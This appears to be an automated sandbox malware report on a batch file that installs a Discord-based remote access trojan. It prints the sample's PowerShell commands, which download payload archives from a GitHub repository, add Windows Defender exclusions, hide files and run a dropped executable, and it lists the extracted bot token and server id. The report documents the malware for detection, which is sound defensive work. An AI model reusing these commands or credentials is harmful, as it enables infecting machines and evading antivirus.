Analysis
-
max time kernel
7s -
max time network
10s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
18-10-2024 23:09
Static task
static1
Behavioral task
behavioral1
Sample
asd.bat
Resource
win10v2004-20241007-en
General
-
Target
asd.bat
-
Size
1KB
-
MD5
0dababeef5a7a86809d847382772d821
-
SHA1
612be301ee1bc7a422f79b2d17822ee2244efc4c
-
SHA256
56af74c6f17f1e987ace45d8ec180ed38d221f2fdfe9d601bdec2d703689bdb4
-
SHA512
1ec9342d34914503dc475fd5fb300cbbb2ace1e9b6e8cc1b9221dd3468eb64a1e0d7f3d0c6f8427207239c61c4b8fb87da89f88f6920b95ef928dd1214d17d6a
Malware Config
Extracted
discordrat
-
discord_token
MTI5Njg5NDEwMjY0NTkwMzQwMA.GbbBFh.ZTr18FyMmzROaUjB4OeMEYamtttj4Hm8E7t2kA
-
server_id
1293738586679672945
Signatures
-
Discord RAT
A RAT written in C# using Discord as a C2.
-
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exepowershell.exeflow pid Process 9 3460 powershell.exe 14 3460 powershell.exe 29 5072 powershell.exe 30 5072 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 3460 powershell.exe 5072 powershell.exe 756 powershell.exe 3748 powershell.exe 2028 powershell.exe 60 powershell.exe 1588 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
Discord.exepid Process 828 Discord.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 12 raw.githubusercontent.com 14 raw.githubusercontent.com 30 raw.githubusercontent.com -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 2028 powershell.exe 2028 powershell.exe 3460 powershell.exe 3460 powershell.exe 60 powershell.exe 60 powershell.exe 756 powershell.exe 756 powershell.exe 3748 powershell.exe 3748 powershell.exe 1588 powershell.exe 1588 powershell.exe 5072 powershell.exe 5072 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 2028 powershell.exe Token: SeDebugPrivilege 3460 powershell.exe Token: SeDebugPrivilege 60 powershell.exe Token: SeDebugPrivilege 756 powershell.exe Token: SeDebugPrivilege 3748 powershell.exe Token: SeDebugPrivilege 1588 powershell.exe Token: SeDebugPrivilege 5072 powershell.exe -
Suspicious use of WriteProcessMemory 30 IoCs
Processes:
cmd.execmd.execmd.exedescription pid Process procid_target PID 3612 wrote to memory of 2028 3612 cmd.exe 85 PID 3612 wrote to memory of 2028 3612 cmd.exe 85 PID 3612 wrote to memory of 4244 3612 cmd.exe 86 PID 3612 wrote to memory of 4244 3612 cmd.exe 86 PID 3612 wrote to memory of 2036 3612 cmd.exe 87 PID 3612 wrote to memory of 2036 3612 cmd.exe 87 PID 3612 wrote to memory of 3460 3612 cmd.exe 88 PID 3612 wrote to memory of 3460 3612 cmd.exe 88 PID 3612 wrote to memory of 2324 3612 cmd.exe 92 PID 3612 wrote to memory of 2324 3612 cmd.exe 92 PID 3612 wrote to memory of 2752 3612 cmd.exe 93 PID 3612 wrote to memory of 2752 3612 cmd.exe 93 PID 2752 wrote to memory of 60 2752 cmd.exe 95 PID 2752 wrote to memory of 60 2752 cmd.exe 95 PID 2752 wrote to memory of 756 2752 cmd.exe 96 PID 2752 wrote to memory of 756 2752 cmd.exe 96 PID 2752 wrote to memory of 3748 2752 cmd.exe 97 PID 2752 wrote to memory of 3748 2752 cmd.exe 97 PID 2752 wrote to memory of 2816 2752 cmd.exe 100 PID 2752 wrote to memory of 2816 2752 cmd.exe 100 PID 2816 wrote to memory of 1588 2816 cmd.exe 102 PID 2816 wrote to memory of 1588 2816 cmd.exe 102 PID 2816 wrote to memory of 5072 2816 cmd.exe 103 PID 2816 wrote to memory of 5072 2816 cmd.exe 103 PID 2816 wrote to memory of 3092 2816 cmd.exe 106 PID 2816 wrote to memory of 3092 2816 cmd.exe 106 PID 2816 wrote to memory of 828 2816 cmd.exe 107 PID 2816 wrote to memory of 828 2816 cmd.exe 107 PID 2816 wrote to memory of 1564 2816 cmd.exe 108 PID 2816 wrote to memory of 1564 2816 cmd.exe 108 -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid Process 2036 attrib.exe 1564 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\asd.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3612 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -window hidden -command ""2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2028
-
-
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"2⤵PID:4244
-
-
C:\Windows\system32\attrib.exeattrib +h "Anon" /s /d2⤵
- Views/modifies file attributes
PID:2036
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://github.com/bonsko216/1/raw/refs/heads/main/1.zip' -OutFile 1.zip"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3460
-
-
C:\Windows\system32\tar.exetar -xf 1.zip2⤵PID:2324
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Anon\1.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -window hidden -command ""3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:60
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:756
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3748
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Anon\2.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -window hidden -command ""4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1588
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://github.com/bonsko216/1/raw/refs/heads/main/Discord.zip' -OutFile Discord.zip"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5072
-
-
C:\Windows\system32\tar.exetar -xf Discord.zip4⤵PID:3092
-
-
C:\Users\Admin\AppData\Local\Anon\Discord.exeDiscord.exe4⤵
- Executes dropped EXE
PID:828
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\Anon\Discord.exe" /s /d4⤵
- Views/modifies file attributes
PID:1564
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
268B
MD5cdb8a5fcca6c6b2ac156c95610dd62b0
SHA1fc9143fbdfc511193d627682d03da517ef03eac0
SHA256c99e311f09fdc9a371c67971575f59962dc1d5bb02afdcff72d74d0b3ede34df
SHA512b1eded36047153fe99fb8fe4e29667d6aefe3431d1de1669f364fa185584bf6fbfff5cd7f10bc7a56f9f055e350276ac4219e737836873b5c542927c317814f9
-
Filesize
661B
MD515af212f6b388a57510af30146ea51f8
SHA19833f92d882d8e69bd453bdb2f3feda15d961c0f
SHA25662b1f7ab4fcf8a68f31afd384c8d1f1d46124991e1d5d19ea04eece62a63a897
SHA51290614fcb1c43df3d46c5d76bfcb777f9a276507e9a6a6a59d5e248e9de04b681656b5417e84758a78848580ca252c1ab07509102c924d2c67a42f419f294ea05
-
Filesize
327B
MD59cbac74f137243a22af973eacd90de31
SHA13260ea401134322fe037a35b685c66a0793c3658
SHA256567296eeadb0e5463e11abc4f05b6617d72944a382d0202cb0cc6954d2a17465
SHA512e729d873c6fd9af96092831ad7efc1fb5deca094fd48a4cc3874ce0c7a6814f97bb7c737393d1755b495dfd91791206d7ba6f8c8d51150ccf698f49627a23e60
-
Filesize
51KB
MD585bced49019c64cbc712ff6e6f14a128
SHA1969c4ca9c1176e06cda1139ef2f1ab3187c0af6c
SHA256d98e1114aaa82b82b670977f156c649b6a242556024e9071b2606ee2e921c5de
SHA5121cceaa34890c95038adbebf83b59b5e8ea04464f5559c9ae2d10484aaa39fe40a25c002bb2b01947593d70aef7a6bc3be03e9ca64eb9ccba860eaddc54149834
-
Filesize
45KB
MD56daf7b41d40c684fc329ddeaa10e8a70
SHA17869289c6b91ce199aa69ade7c9bcc973cb60b2c
SHA256df78cfcaa08580827f47fcffc59c133e77ccdbe893817cfa28cb519ec5826927
SHA512b9fcabe209f08c9de6b1f01cc33d28909d9e4912d061858236771e6c58822b2021cfeb0ddb94900111a34e19b7adff3d54039857b2662c9e8d0b041377282915
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
64B
MD53ca1082427d7b2cd417d7c0b7fd95e4e
SHA1b0482ff5b58ffff4f5242d77330b064190f269d3
SHA25631f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3
-
Filesize
1KB
MD51dffbab5ecc6d06e8b259ad505a0dc2a
SHA10938ec61e4af55d7ee9d12708fdc55c72ccb090c
SHA256a9d2e6d35c5e9b94326042c6f2fe7ef381f25a0c02b8a559fc1ee888ccffb18e
SHA51293209a16400574416f6f992c2d403acc399179fc911818c4967c9a0211924486878578d1c98ba3bc9e269012603c96ab118a291bf53c57d8af9ab48f9e7b9b76
-
Filesize
64B
MD5b16dc67d8633fb86f9d9dc491097150e
SHA10ea564df2675c5e2a82449530dd070ad855dfcd6
SHA256378c51f20fe67c7ef650d594dca84dd39f8eaeb28876fe783bb3f98394bb494b
SHA512c41852fc8c6728dce8aaa7d9104b39c9e9a6bdcc0354ff5e0d0bff3c055b9aebbb080111c90f6b70db28a1e81b8ca1e3cfec4f8a4f6e59a75188215c21788cdd
-
Filesize
944B
MD596ff1ee586a153b4e7ce8661cabc0442
SHA1140d4ff1840cb40601489f3826954386af612136
SHA2560673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA5123404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569
-
Filesize
944B
MD596e3b86880fedd5afc001d108732a3e5
SHA18fc17b39d744a9590a6d5897012da5e6757439a3
SHA256c3077e4cadb4ed246c02abe55aa6cf832fee4c2546b7addb7d22cd1c7c8c1294
SHA512909b1968f7204fa7029109b02232d8cc5438f6b4dc7c9044e4e47c59fcee538199b13029e36592b12ed573d48a308dd4822d2ced4129ab08d4111897e02be55d
-
Filesize
64B
MD502c05ea0305ff81a1dcdcf0144d163c4
SHA14d0dfaa89ace93c8981325a37a2529536779d329
SHA256fb9ab3d6f37e071366cb9016d0be7987b8cfd64f13b222159fe7218977d27016
SHA5129b28f94b689cb3011720a1f026ef458dcee633336d1727743a5d3c52464d4bf6c9f0c2f21b3e30c6fc37de39b772fc1dae4f0f9263d6f1f72426f4a70de1d4df
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82